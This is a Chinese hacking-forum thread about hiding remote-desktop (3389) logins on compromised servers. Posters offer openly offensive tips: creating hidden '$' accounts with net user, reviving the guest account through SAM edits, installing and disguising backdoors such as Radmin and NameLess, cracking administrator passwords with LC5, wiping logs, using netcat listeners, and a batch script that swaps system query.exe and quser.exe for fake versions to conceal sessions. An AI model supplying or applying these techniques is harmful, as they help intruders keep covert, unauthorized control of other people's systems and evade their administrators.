[讨论]如何隐藏3389登陆用户 用户, 隐藏, 登陆, 讨论

s37su37

[讨论]如何隐藏3389登陆用户
议题作者：huffery
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

经常需要通过3389服务登陆肉鸡，作一些事情。这样在任务管理器里面可以发现
当前登陆的用户。虽然是克隆帐户，显示的是被克隆的用户。这样也不够好。
管理员发现会怀疑的。不知谁思考过这个问题，或者有解决的方法。大家讨论讨论
帖子15 精华4 积分79 阅读权限40 在线时间35 小时 注册时间2005-7-17 最后登录2008-1-28 查看详细资料引用 报告 回复 TOP 爱要怎么说出口


hshack
晶莹剔透§烈日灼然

哑雪

其实直接用他的guest就好，guest表面显示禁用，其实可以用的，你在sam里面替换下就可以了。不过还是可以看出来的，但是比重新建立个隐藏帐户要安全多了。
要是想什么都不显示的话，用远程控制好了。
NCPH好像可以隐藏端口的，你可以试试看。
帖子162 精华2 积分431 阅读权限40 在线时间75 小时 注册时间2005-8-4 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP

黑眼圈sct
荣誉会员

成哥

隐藏不如换一下断口~~还是这个有实效行偶的烂LOG :http://blog.yesky.com/Blog/yanfeics/

帖子66 精华2 积分158 阅读权限40 性别女 在线时间139 小时 注册时间2006-8-24 最后登录2007-7-5 查看个人网站
查看详细资料引用 报告 回复 TOP

xiaocool
晶莹剔透§烈日灼然

jilang

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的：
想问下，专业版2k怎么转server版，以前看到过一个小东西。现在不见了。
NTSwitch

This program will change the operating system type on your computer.
附件
NTSwitch.rar (108 KB)
2006-9-1 19:30, 下载次数: 164 Heaven is a place nearby so I won't be so far away and if you try and look for me maybe you'll find me someday
帖子171 精华10 积分3877 阅读权限150 性别男 在线时间257 小时 注册时间2005-12-17 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP

别动我飘着呢
晶莹剔透§烈日灼然

纯银

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的：
想问下，专业版2k怎么转server版，以前看到过一个小东西。现在不见了。
NTSWITCH可以实现你要做功能，具体程序我已经实现有机会再上传吧。我现在在这里权限很低，如果有空到红狼或者狼族上找PEGRE，索要该工具。
帖子20 精华0 积分54 阅读权限40 在线时间33 小时 注册时间2005-7-19 最后登录2008-2-9 查看详细资料引用 报告 回复 TOP

zhuwg
运维管理组

ming312

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的：
想问下，专业版2k怎么转server版，以前看到过一个小东西。现在不见了。
NTSwitch
帖子1 精华0 积分6 阅读权限40 在线时间35 小时 注册时间2005-1-12 最后登录2007-12-7 查看详细资料引用 报告 回复 TOP

iskilo
晶莹剔透§烈日灼然

非法操作

不管你怎么隐藏，打开注册表编辑器的RAM项，全部暴光！成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

tveo
晶莹剔透§烈日灼然

车BB

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的：
想问下，专业版2k怎么转server版，以前看到过一个小东西。现在不见了。
---------------再次安装选升级就可以了，是在2003 server企业版下可以实现，其他的不清楚。
帖子19 精华0 积分27 阅读权限40 在线时间0 小时 注册时间2005-10-29 最后登录2007-11-2 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

草本刚

想问下，专业版2k怎么转server版，以前看到过一个小东西。现在不见了。
帖子22 精华0 积分50 阅读权限40 在线时间32 小时 注册时间2006-8-13 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP

跟着感觉走
晶莹剔透§烈日灼然

XIELLP

装一些小后门比如nameNameLess 既可以正向连又可以反向连.每次想连3389的时候先看看管理员在不在线.哪位高手也可以写个程序监视有没有人连上来的,一但有人连上服务器就报警.
帖子12 精华0 积分38 阅读权限40 性别男 在线时间52 小时 注册时间2006-8-3 最后登录2008-7-1 查看详细资料引用 报告 回复 TOP

infofly
晶莹剔透§烈日灼然

langchen

我感觉可以放个小马的哈，或者用lake2的sqlshell。很不错的选择。
如果想长期保留，还可以新建立用户，半夜登陆。。跑个lc5，嘿嘿，把他psw跑出来就OK了。。珍爱生命，潜心修炼，早日成仙。
帖子374 精华2 积分3971 阅读权限150 性别男 在线时间708 小时 注册时间2006-8-27 最后登录2008-7-6 查看详细资料引用 报告 回复 TOP

liu830219
晶莹剔透§烈日灼然

auqa

你所要求的东西太难,你都连上去了,要躲过他人的眼睛不是那么容易. 换个方法来解决当前的困惑.
很多事情不一定要用终端图形来操作,锻炼在shell下操作的能力,既能隐藏行踪,又能让对方服务器少耗资源.
关于bt,你的问题在于需要长时间连接终端.那先登陆,选择好你要下载的东西,并配制bt工具为启动继续先前任务退出终端,进入自己安装的shell后门(system权限),start bt程序.这样不就能下载了?而你又能自行退出shell,不留IP没有用户登陆,没有长连接存在.
关于反弹溢出的程序,可以打开对方telnet啊,t上去就象本地cmd一样稳定,来个nc监听.
帖子26 精华0 积分93 阅读权限40 在线时间25 小时 注册时间2005-1-27 最后登录2008-2-2 查看详细资料引用 报告 回复 TOP

cnhcerkf
运维管理组

XYFHID

上面许多人都没有明白我的问题. 就是管理员能够发现有其他人登陆.
不是隐藏用户名的问题.
任务管理器/ - 用户,就可以看到拉.
我想这应该是将来写rootkit要考虑的. 要hook一些涵数吧..
3389确实好用,而且服务器机器比你自己要好的多, 又是外网, 独立IP
BT下载nM每秒, 作为跳板, 作为反弹后门主机..........
帖子15 精华4 积分79 阅读权限40 在线时间35 小时 注册时间2005-7-17 最后登录2008-1-28 查看详细资料引用 报告 回复 TOP

testplay
晶莹剔透§烈日灼然

paul

用黑客之门+radmin就够了，一般情况下3389还是好用，但是一般不太容易被发现，哪个SB管理员天天趴服务器上看谁上线，除非你命背或者日志记录，记的用工具清除！
帖子16 精华0 积分24 阅读权限100 在线时间16 小时 注册时间2005-11-3 最后登录2008-6-15 查看详细资料引用 报告 回复 TOP

dingsy
晶莹剔透§烈日灼然

佳仔

你说的这问题好象只有2003才会出现吧
帖子14 精华0 积分48 阅读权限40 在线时间15 小时 注册时间2005-2-3 最后登录2008-1-8 查看详细资料引用 报告 回复 TOP

huffery
晶莹剔透§烈日灼然

=wayne=

就目前而言，如果你要对电脑进行操作，最好还是用3389，radmin类似于一个合法木马，你在操作时，肉鸡管理员看到鼠标乱窜，不被吓坏才奇怪哦。
3389一般来说还是够用了。
有一楼的朋友说跟管理员用一个同样的账户就不会被发现，其实不然，如果你和管理员都用的时候一个账户，如administrator，在任务管理器里面会出现两个相同账户的运行记录的。请多赐教！谢谢！

帖子3 精华0 积分13 阅读权限40 性别男 在线时间7 小时 注册时间2006-8-11 最后登录2006-10-18 查看详细资料引用 报告 回复 TOP

小猴哥
荣誉会员

powerfive

要我说 3389还是比较容易被发现 装个后门不错 把Radmin打造一下 做个假的服务 还是很好用的
帖子6 精华0 积分23 阅读权限40 在线时间17 小时 注册时间2005-11-14 最后登录2008-7-16 查看详细资料引用 报告 回复 TOP

webmaster
晶莹剔透§烈日灼然

yemao4587

引用:
这里是引用第[7 楼]的网虫qqq于2006-08-05 14:25发表的：
@echo off
@del c:winnsystem32query.exe
@del c:winntsystem32dllcachequery.exe
@del c:winnsystem32quser.exe
@del c:winntsystem32dllcachequser.exe
.......
你得先把假的query.exe复制到指定的目录，然后进行替换。
不过，管理员还是可以在终端的管理里面看见你在线的。http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP

antiblue
晶莹剔透§烈日灼然

天下无敌

不是说用net user st285$ 123456 /add.就是在帐号后面加个"$"这样用net user都查不出来.然后去C:\Documents and Settings\All Users或者C:\Documents and Settings\Administrator下面把以你的帐号命名的文件夹属性改成隐藏不就可以瞒天过海拉？

帖子72 精华0 积分127 阅读权限40 性别男 在线时间39 小时 注册时间2006-2-8 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日，预测咨询，公司改名，权威易经

网虫qqq
晶莹剔透§烈日灼然

NSX

@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\query.exe c:\winnt\system32\query.exe
@copy c:\winnt\quser.exe c:\winnt\system32\quser.exe


  这样的代码怎么运行？
帖子7 精华0 积分51 阅读权限40 在线时间15 小时 注册时间2006-8-5 最后登录2008-7-7 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

zhuixun2006
晶莹剔透§烈日灼然